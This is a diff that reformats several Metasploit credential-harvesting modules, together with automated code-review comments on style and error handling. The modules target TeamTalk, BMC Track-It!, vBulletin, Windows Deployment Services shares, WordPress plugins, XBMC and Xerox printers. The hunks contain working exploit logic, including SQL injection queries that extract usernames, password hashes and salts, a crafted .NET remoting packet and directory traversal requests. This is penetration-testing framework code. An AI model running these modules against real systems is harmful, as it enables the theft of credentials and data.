@@ -44,10 +47,10 @@ class MetasploitModule < Msf::Auxiliary
print_status "Found TeamTalk (protocol version #{$1})"
report_service :host => rhost,
:port => rport,
report_service :host => rhost,
:port => rport,
:proto => 'tcp',
:name => 'teamtalk'
:name => 'teamtalk'
vprint_status "Authenticating as '#{username}'"
@@ -80,8 +83,8 @@ class MetasploitModule < Msf::Auxiliary
return
end
cred_table = Rex::Text::Table.new 'Header' => 'TeamTalk User Credentials',
'Indent' => 1,
cred_table = Rex::Text::Table.new 'Header' => 'TeamTalk User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password', 'Type']
res.each_line do |line|
@@ -93,10 +96,10 @@ class MetasploitModule < Msf::Auxiliary
type = line.scan(/\s+usertype=(\d+)\s+/).flatten.first
cred_table << [ user, pass, type ]
report_cred user: user,
report_cred user: user,
password: pass,
type: type,
proof: line
type: type,
proof: line
end
if cred_table.rows.empty?
@@ -133,26 +136,26 @@ class MetasploitModule < Msf::Auxiliary
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
address: rhost,
port: rport,
service_name: 'teamtalk',
protocol: 'tcp',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge service_data
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
access_level: opts[:type],
proof: opts[:proof]
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
access_level: opts[:type],
proof: opts[:proof]
}.merge service_data
create_credential_login login_data
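Review bot: `$1` in `print_status "Found TeamTalk (protocol version #{$1})"` depends on the last regex match, whose `=~` lies outside the hunk, so the interpolation prints nothing if any other match runs in between; `Regexp.last_match(1)` at least names the dependency, and capturing the match into a local at the `=~` site is clearer still. The parenthesis-less `report_service :host => rhost, ...` and `report_cred user: user, ...` calls with multi-line hash arguments are the form RuboCop's Style/MethodCallWithArgsParentheses wraps in parentheses, which is also how the `report_note(...)` calls in the other modules of this commit are written. The enclosing `run` method starts outside these hunks.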
@@ -10,37 +10,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure',
'Description' => %q{
This module exploits an unauthenticated configuration retrieval .NET remoting
service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain
Administrator and the SQL server user credentials.
This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
10.0.0.143 and 9.0.30.248.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure',
'Description' => %q{
This module exploits an unauthenticated configuration retrieval .NET remoting
service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain
Administrator and the SQL server user credentials.
This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
10.0.0.143 and 9.0.30.248.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2014-4872' ],
[ 'OSVDB', '112741' ],
[ 'US-CERT-VU', '121036' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Oct/34' ]
],
'DisclosureDate' => '2014-10-07'
))
'DisclosureDate' => '2014-10-07'
)
)
register_options(
[
OptPort.new('RPORT',
[true, '.NET remoting service port', 9010])
])
[true, '.NET remoting service port', 9010])
]
)
end
def prepare_packet(bmc)
#
# ConfigurationService packet structure:
@@ -71,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
# - DomainAdminUserName
# - DomainAdminEncryptedPassword
#
packet_header_pre_packet_size= [
packet_header_pre_packet_size = [
0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00
]
@@ -105,9 +106,9 @@ class MetasploitModule < Msf::Auxiliary
@packet_terminator = [ 0x0b ]
service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/,(bmc ? "Trackit" : "Numara.TrackIt"))
method = "GetProductDeploymentValues".gsub(/TrackIt/,(bmc ? "Trackit" : "Numara.TrackIt"))
type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(bmc ? "TrackIt" : "Numara.TrackIt"))
service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/, (bmc ? "Trackit" : "Numara.TrackIt"))
method = "GetProductDeploymentValues".gsub(/TrackIt/, (bmc ? "Trackit" : "Numara.TrackIt"))
type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/, (bmc ? "TrackIt" : "Numara.TrackIt"))
uri = "tcp://" + rhost + ":" + rport.to_s + "/" + service
@@ -154,15 +155,15 @@ class MetasploitModule < Msf::Auxiliary
return buf
end
def fill_loot_from_packet(packet_reply, loot)
loot.each_key { |str|
if loot[str] != nil
next
end
if (index = (packet_reply.index(str))) != nil
# after str, discard 5 bytes then get str_value
size = packet_reply[index + str.length + 5,1].unpack('C*')[0]
size = packet_reply[index + str.length + 5, 1].unpack('C*')[0]
if size == 255
# if we received 0xFF then there is no value for this str
# set it to empty but not nil so that we don't look for it again
@@ -174,7 +175,6 @@ class MetasploitModule < Msf::Auxiliary
}
end
def run
packet = prepare_packet(true)
@@ -290,13 +290,13 @@ class MetasploitModule < Msf::Auxiliary
end
credential_core = report_credential_core({
password: loot[database_pw],
username: loot[schema_owner],
sid: sid
})
password: loot[database_pw],
username: loot[schema_owner],
sid: sid
})
# Get just the hostname
db_address= loot[database_server_name].split('\\')[0]
db_address = loot[database_server_name].split('\\')[0]
begin
database_login_data = {
@@ -334,8 +334,7 @@ class MetasploitModule < Msf::Auxiliary
end
end
def report_credential_core(cred_opts={})
def report_credential_core(cred_opts = {})
# Set up the has for our Origin service
origin_service_data = {
address: rhost,
@@ -360,9 +359,9 @@ class MetasploitModule < Msf::Auxiliary
})
elsif cred_opts[:sid]
credential_data.merge!({
realm_key: Metasploit::Model::Realm::Key::ORACLE_SYSTEM_IDENTIFIER,
realm_value: cred_opts[:sid]
})
realm_key: Metasploit::Model::Realm::Key::ORACLE_SYSTEM_IDENTIFIER,
realm_value: cred_opts[:sid]
})
end
credential_data.merge!(origin_service_data)
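Review bot: `size = packet_reply[index + str.length + 5, 1].unpack('C*')[0]` in `fill_loot_from_packet` assumes the reply carries at least five bytes after the matched key; on a short or truncated reply `packet_reply[...]` is nil and the call raises NoMethodError instead of skipping the key. Guard it before unpacking: `size_byte = packet_reply[index + str.length + 5, 1]` / `next if size_byte.nil?` / `size = size_byte.unpack1('C')`. The `if loot[str] != nil ... next ... end` block above it reads more directly as `next unless loot[str].nil?`, and the multi-line `each_key { |str| ... }` would conventionally be `do ... end`. `fill_loot_from_packet` continues past the hunk.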
+27 -27
@@ -8,31 +8,32 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin Password Collector via nodeid SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been
used in the wild since March 2013. This module can be used to extract the web application's
usernames and hashes, which could be used to authenticate into the vBulletin admin control
panel.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'vBulletin Password Collector via nodeid SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been
used in the wild since March 2013. This module can be used to extract the web application's
usernames and hashes, which could be used to authenticate into the vBulletin admin control
panel.
},
'References' => [
[ 'CVE', '2013-3522' ],
[ 'OSVDB', '92031' ],
[ 'EDB', '24882' ],
[ 'BID', '58754' ],
[ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
],
'Author' =>
[
'Author' => [
'Orestis Kourides', # Vulnerability discovery and PoC
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-03-24'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-03-24'
)
)
register_options(
[
@@ -40,7 +41,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new("NODE", [false, 'Valid Node ID']),
OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
])
]
)
end
def exists_node?(id)
@@ -95,13 +97,13 @@ class MetasploitModule < Msf::Auxiliary
injection << "AND (#{random_and}=#{random_and}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'vars_post' =>
{
'nodeid' => "#{node}#{injection}",
'nodeid' => "#{node}#{injection}",
}
})
})
unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
return nil
@@ -117,9 +119,9 @@ class MetasploitModule < Msf::Auxiliary
end
def get_user_data(node_id, user_id)
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id + 1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id + 1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id + 1}")
return [user, pass, salt]
end
@@ -187,8 +189,8 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{count_users} users found. Collecting credentials...")
users_table = Rex::Text::Table.new(
'Header' => 'vBulletin Users',
'Indent' => 1,
'Header' => 'vBulletin Users',
'Indent' => 1,
'Columns' => ['Username', 'Password Hash', 'Salt']
)
@@ -215,6 +217,4 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
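Review bot: `unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/` mixes `and` into a boolean expression; `and` binds looser than `=~` and assignment, which is the precedence trap RuboCop's Style/AndOr flags, and the match result is only used as a boolean. Write it as `unless res && res.code == 200 && res.body.to_s.match?(/Database error in vBulletin/)`, which also avoids allocating MatchData. The `do_sqli` method begins before this hunk.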
@@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
@@ -13,39 +12,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer',
'Description' => %q{
This module will search remote file shares for unattended installation files that may contain
domain credentials. This is often used after discovering domain credentials with the
auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
have domain credentials. This module will connect to the RemInst share and any Microsoft
Deployment Toolkit shares indicated by the share name comments.
},
'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
'License' => MSF_LICENSE,
'References' =>
[
},
'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'],
[ 'URL', 'http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html'],
],
))
)
)
register_options(
[
Opt::RPORT(445),
OptString.new('SMBDomain', [ false, "SMB Domain", '']),
])
]
)
end
# Determine the type of share based on an ID type value
def share_type(val)
stypes = %W{ DISK PRINTER DEVICE IPC SPECIAL TEMPORARY }
stypes = %W{DISK PRINTER DEVICE IPC SPECIAL TEMPORARY}
stypes[val] || 'UNKNOWN'
end
# Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC
# and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed!
def srvsvc_netshareenum
@@ -61,10 +61,10 @@ class MetasploitModule < Msf::Auxiliary
stubdata =
NDR.uwstring("\\\\#{rhost}") +
NDR.long(1) #level
NDR.long(1) # level
ref_id = stubdata[0,4].unpack("V")[0]
ctr = [1, ref_id + 4 , 0, 0].pack("VVVV")
ref_id = stubdata[0, 4].unpack("V")[0]
ctr = [1, ref_id + 4, 0, 0].pack("VVVV")
stubdata << ctr
stubdata << NDR.align(ctr)
@@ -83,11 +83,11 @@ class MetasploitModule < Msf::Auxiliary
end
# Level, CTR header, Reference ID of CTR
res.slice!(0,12)
res.slice!(0, 12)
share_count = res.slice!(0, 4).unpack("V")[0]
# Reference ID of CTR1
res.slice!(0,4)
res.slice!(0, 4)
share_max_count = res.slice!(0, 4).unpack("V")[0]
if share_max_count != share_count
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary
end
# ReferenceID / Type / ReferenceID of Comment
types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]}
types = res.slice!(0, share_count * 12).scan(/.{12}/n).map { |a| a[4, 2].unpack("v")[0] }
share_count.times do |t|
length, offset, max_length = res.slice!(0, 12).unpack("VVV")
@@ -109,20 +109,20 @@ class MetasploitModule < Msf::Auxiliary
end
name = res.slice!(0, 2 * length)
res.slice!(0,2) if length % 2 == 1 # pad
res.slice!(0, 2) if length % 2 == 1 # pad
comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV")
if comment_offset != 0
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment offset was not zero")
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment offset was not zero")
end
if comment_length != comment_max_length
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment max length was not length")
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment max length was not length")
end
comment = res.slice!(0, 2 * comment_length)
res.slice!(0,2) if comment_length % 2 == 1 # pad
res.slice!(0, 2) if comment_length % 2 == 1 # pad
shares << [ name, share_type(types[t]), comment]
end
@@ -151,7 +151,6 @@ class MetasploitModule < Msf::Auxiliary
deploy_shares.each do |deploy_share|
query_share(deploy_share)
end
rescue ::Interrupt
raise $!
end
@@ -186,11 +185,9 @@ class MetasploitModule < Msf::Auxiliary
print_good("Credentials: " +
"Path=#{share_path}#{file_path} " +
"Username=#{cred['domain'].to_s}\\#{cred['username'].to_s} " +
"Password=#{cred['password'].to_s}"
)
"Password=#{cred['password'].to_s}")
end
end
end
def report_cred(opts)
@@ -220,7 +217,6 @@ class MetasploitModule < Msf::Auxiliary
end
def parse_client_unattend(data)
begin
xml = REXML::Document.new(data)
rescue REXML::ParseException => e
@@ -232,6 +228,7 @@ class MetasploitModule < Msf::Auxiliary
def loot_unattend(data)
return if data.empty?
path = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services")
print_good("Stored unattend.xml in #{path}")
end
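Review bot: `stypes = %W{DISK PRINTER DEVICE IPC SPECIAL TEMPORARY}` in `share_type` uses the interpolating `%W` for a literal list with nothing to interpolate; `%w[...]` is the form RuboCop's Style/PercentLiteralDelimiters expects, and hoisting it to a frozen constant avoids rebuilding the array on every call. `stypes[val]` also raises TypeError when `val` is nil, which `types[t]` yields whenever `scan(/.{12}/n)` returns fewer than `share_count` entries from a short reply; `(val && stypes[val]) || 'UNKNOWN'` keeps the fallback meaningful. In the `rescue ::Interrupt` hunk, `raise $!` is what a bare `raise` inside a rescue already does. `srvsvc_netshareenum` and `run` extend beyond their hunks.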
@@ -8,31 +8,32 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress All-in-One Migration Export',
'Description' => %q{
This module allows you to export Wordpress data (such as the database, plugins, themes,
uploaded files, etc) via the All-in-One Migration plugin without authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'WordPress All-in-One Migration Export',
'Description' => %q{
This module allows you to export Wordpress data (such as the database, plugins, themes,
uploaded files, etc) via the All-in-One Migration plugin without authentication.
},
'License' => MSF_LICENSE,
'Author' => [
'James Golovich', # Disclosure
'rastating' # Metasploit module
'rastating' # Metasploit module
],
'References' =>
[
'References' => [
['WPVDB', '7857'],
['URL', 'https://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability']
],
'DisclosureDate' => '2015-03-19'
))
'DisclosureDate' => '2015-03-19'
)
)
register_options(
[
OptInt.new('MAXTIME', [ true, 'The maximum number of seconds to wait for the export to complete', 300 ])
])
]
)
end
def check
@@ -43,11 +44,12 @@ class MetasploitModule < Msf::Auxiliary
print_status("Requesting website export...")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_get' => { 'action' => 'router' },
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_get' => { 'action' => 'router' },
'vars_post' => { 'options[action]' => 'export' }
}, datastore['MAXTIME'])
}, datastore['MAXTIME']
)
unless res
fail_with(Failure::Unknown, "#{peer} - No response from the target")
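Review bot: `fail_with(Failure::Unknown, "#{peer} - No response from the target")` classifies a missing response as an unknown failure, while the Ultimate CSV Importer module in this same commit reports the identical condition as `Failure::Unreachable`; using `fail_with(Failure::Unreachable, "#{peer} - No response from the target")` here keeps the failure reason consistent for anyone filtering on it. The `res` check belongs to `run`, which continues past the hunk.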
@@ -10,28 +10,28 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Ultimate CSV Importer User Table Extract',
'Description' => %q{
Due to lack of verification of a visitor's permissions, it is possible
to execute the 'export.php' script included in the default installation of the
Ultimate CSV Importer plugin and retrieve the full contents of the user table
in the WordPress installation. This results in full disclosure of usernames,
hashed passwords and email addresses for all users.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'WordPress Ultimate CSV Importer User Table Extract',
'Description' => %q{
Due to lack of verification of a visitor's permissions, it is possible
to execute the 'export.php' script included in the default installation of the
Ultimate CSV Importer plugin and retrieve the full contents of the user table
in the WordPress installation. This results in full disclosure of usernames,
hashed passwords and email addresses for all users.
},
'License' => MSF_LICENSE,
'Author' => [
'James Hooker', # Disclosure
'rastating' # Metasploit module
'rastating' # Metasploit module
],
'References' =>
[
'References' => [
['WPVDB', '7778']
],
'DisclosureDate' => '2015-02-02'
))
'DisclosureDate' => '2015-02-02'
)
)
end
def plugin_url
@@ -89,8 +89,8 @@ class MetasploitModule < Msf::Auxiliary
def run
print_status("Requesting CSV extract...")
res = send_request_cgi(
'method' => 'POST',
'uri' => exporter_url,
'method' => 'POST',
'uri' => exporter_url,
'vars_post' => { 'export' => 'users' }
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
@@ -10,27 +10,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract',
'Description' =>
"The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
'Name' => 'WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract',
'Description' => "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
and its results in files for fast access. Version 0.9.2.4 has been fixed afterwards
so it can be vulnerable. These cache files are in the webroot of the Wordpress
installation and can be downloaded if the name is guessed. This module tries to
locate them with brute force in order to find usernames and password hashes in these
files. W3 Total Cache must be configured with Database Cache enabled and Database
Cache Method set to Disk to be vulnerable",
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '88744'],
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/242'],
['WPVDB', '6621']
],
'Author' =>
[
'Christian Mehlmauer', # Metasploit module
'Jason A. Donenfeld <Jason[at]zx2c4.com>' # POC
]
'License' => MSF_LICENSE,
'References' => [
['OSVDB', '88744'],
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/242'],
['WPVDB', '6621']
],
'Author' => [
'Christian Mehlmauer', # Metasploit module
'Jason A. Donenfeld <Jason[at]zx2c4.com>' # POC
]
)
register_options(
@@ -38,7 +35,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TABLE_PREFIX', [true, 'Wordpress table prefix', 'wp_']),
OptInt.new('SITE_ITERATIONS', [true, 'Number of sites to iterate', 25]),
OptInt.new('USER_ITERATIONS', [true, 'Number of users to iterate', 25])
])
]
)
end
def table_prefix
@@ -58,13 +56,12 @@ class MetasploitModule < Msf::Auxiliary
user_url = normalize_uri(target_uri)
begin
send_request_cgi(
'uri' => user_url,
'method' => 'GET',
'uri' => user_url,
'method' => 'GET',
'vars_get' => {
'author' => user_id.to_s
}
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Unable to connect to #{user_url}")
rescue ::Timeout::Error, ::Errno::EPIPE
@@ -106,11 +103,9 @@ class MetasploitModule < Msf::Auxiliary
users_found = false
(1..site_iterations).each do |site_id|
vprint_status("Trying site_id #{site_id}...")
(1..user_iterations).each do |user_id|
vprint_status("Trying user_id #{user_id}...")
# used to cache the statement
+19 -17
@@ -7,28 +7,29 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "XBMC Web Server Directory Traversal",
'Description' => %q{
def initialize(info = {})
super(
update_info(
info,
'Name' => "XBMC Web Server Directory Traversal",
'Description' => %q{
This module exploits a directory traversal bug in XBMC 11, up until the
2012-11-04 nightly build. The module can only be used to retrieve files.
},
'License' => MSF_LICENSE,
'Author' =>
[
2012-11-04 nightly build. The module can only be used to retrieve files.
},
'License' => MSF_LICENSE,
'Author' => [
'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton
'Lucas "acidgen" Lundgren IOActive',
'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
],
'References' =>
[
'References' => [
['URL', 'https://forum.kodi.tv/showthread.php?tid=144110&pid=1227348'],
['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'],
['URL', 'https://ioactive.com/pdfs/Security_Advisory_XBMC.pdf'],
],
'DisclosureDate' => '2012-11-04'
))
'DisclosureDate' => '2012-11-04'
)
)
register_options(
[
@@ -37,7 +38,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('DEPTH', [true, 'The max traversal depth', 9]),
OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'xbmc']),
OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'xbmc']),
])
]
)
end
def run
@@ -48,12 +50,12 @@ class MetasploitModule < Msf::Auxiliary
end
# Create request
traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep
traversal = "../" * datastore['DEPTH'] # The longest of all platforms tested was 9 deep
begin
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
}, 25)
rescue Rex::ConnectionRefused
print_error("#{rhost}:#{rport} Could not connect.")
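Review bot: The References array in the initialize hunk still carries a trailing comma after its last entry, `['URL', 'https://ioactive.com/pdfs/Security_Advisory_XBMC.pdf'],`, while the Author array directly above it does not, so the two literals read inconsistently after the reformat. Dropping it, `['URL', 'https://ioactive.com/pdfs/Security_Advisory_XBMC.pdf']`, keeps the style uniform with the other metadata arrays touched by this commit. The initialize method closes inside that hunk, but the run method shown in the later hunk continues past the section.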
+19 -16
@@ -7,27 +7,30 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Xerox Administrator Console Password Extractor',
'Description' => %q{
This module will extract the management console's admin password from the
Xerox file system using firmware bootstrap injection.
},
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Xerox Administrator Console Password Extractor',
'Description' => %q{
This module will extract the management console's admin password from the
Xerox file system using firmware bootstrap injection.
},
'Author' => [
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
OptPort.new('RPORT', [true, 'Web management console port for the printer', 80]),
OptPort.new('JPORT', [true, 'Jetdirect port', 9100]),
OptInt.new('TIMEOUT', [true, 'Timeout to wait for printer job to run', 45])
])
OptInt.new('TIMEOUT', [true, 'Timeout to wait for printer job to run', 45])
]
)
end
def jport
@@ -47,10 +50,10 @@ class MetasploitModule < Msf::Auxiliary
if passwd
print_good("#{rhost}:#{jport} - Password found: #{passwd}")
loot_name = 'xerox.password'
loot_type = 'text/plain'
loot_name = 'xerox.password'
loot_type = 'text/plain'
loot_filename = 'xerox_password.text'
loot_desc = 'Xerox password harvester'
loot_desc = 'Xerox password harvester'
p = store_loot(loot_name, loot_type, datastore['RHOST'], passwd, loot_filename, loot_desc)
print_good("#{rhost}:#{jport} - Credentials saved in: #{p}")
